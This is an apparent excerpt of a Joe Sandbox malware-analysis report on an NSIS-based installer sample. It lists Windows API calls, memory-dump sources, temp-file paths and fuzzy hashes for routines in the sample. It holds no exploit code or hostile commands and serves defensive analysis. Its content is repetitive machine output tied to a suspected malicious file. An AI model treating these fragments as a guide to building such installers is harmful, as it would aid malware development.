                                                                      • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                      • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                      • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                      • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 70022447
                                                                        • Part of subcall function 70021224: lstrcpynA.KERNEL32(00000000,?,700212CF,-7002404B,700211AB,-000000A0), ref: 70021234
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 700223C2
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700223D7
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700223E8
                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 700223F6
                                                                      • GlobalFree.KERNEL32(00000000), ref: 700223FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 3730416702-0
                                                                      • Opcode ID: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
                                                                      • Instruction ID: 21e80bfaa55df9d1afa5f65c0e1d50691b181eb7c5a7ef8b91627228383cdf50
                                                                      • Opcode Fuzzy Hash: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
                                                                      • Instruction Fuzzy Hash: B9416A72504300EFE321EFB0EC84B6EB7E9FB40B32F20481AF54686152D774AA45CB61
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,00042C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                      • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                      • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                      • Opcode Fuzzy Hash: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                      • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
                                                                      • Instruction ID: 127549feec88d67223c87326f53f2ec0c5383ce26c55aed568ab727de9e7750c
                                                                      • Opcode Fuzzy Hash: b1e8a7d7a168ce10e0c3d148c682e8599d661da08927babee03f3dfc73a98512
                                                                      • Instruction Fuzzy Hash: 5E51E832D04154AEDB129FB4FC546EEBBFBAB68A77F24005AE407A3305C6316D818752
                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401D58
                                                                      • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                      • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                      • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                      • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                      • Opcode Fuzzy Hash: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                      • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401E02
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                      • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                      • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                      • Opcode Fuzzy Hash: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                      • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                      • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                      • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                      • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                      • wsprintfA.USER32 ref: 0040496A
                                                                      • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                      • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                      • Opcode Fuzzy Hash: 17aaa45ac1cbaaaffbe8dd61fb40f021ccac07db2aae94c567de9f3a79f05f34
                                                                      • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402488
                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004024C5
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp
                                                                      • API String ID: 2655323295-4060891014
                                                                      • Opcode ID: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                      • Instruction ID: d7f14aed55912e39ad141723e2cbb786b74cb62cb57f73557c42781e6368b2a7
                                                                      • Opcode Fuzzy Hash: b93bb4b41e3f968b3a17595c186f125e9775901fc116c1543042db4b6de8d025
                                                                      • Instruction Fuzzy Hash: BC119071E00218BEEB01EFA58E49EAE7BB5EB48314F21443BF504B72C1C6F85D419A18
                                                                      APIs
                                                                        • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso1F91.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AC6
                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 00405AD6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso1F91.tmp
                                                                      • API String ID: 3248276644-163294642
                                                                      • Opcode ID: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                      • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                      • Opcode Fuzzy Hash: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
                                                                      • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040598B
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403235,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 00405994
                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 004059A5
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405985
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-4083868402
                                                                      • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                      • Instruction ID: 19b991fbecd43d68fcf8fbe3975c191da3a7c8eaa4a3e5077e024cb3b188d11e
                                                                      • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                      • Instruction Fuzzy Hash: 8DD0A7A21059306AE20266159C09DDB19088F12315B060027F101B2191C63C0D1187FE
                                                                      APIs
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                      • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                      • Opcode Fuzzy Hash: c535ffd0503d7e53353de938b4ef0013261f8bb9891db40cf21ea401e86fa320
                                                                      • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                      APIs
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                      • CharNextA.USER32(00000000), ref: 00405A31
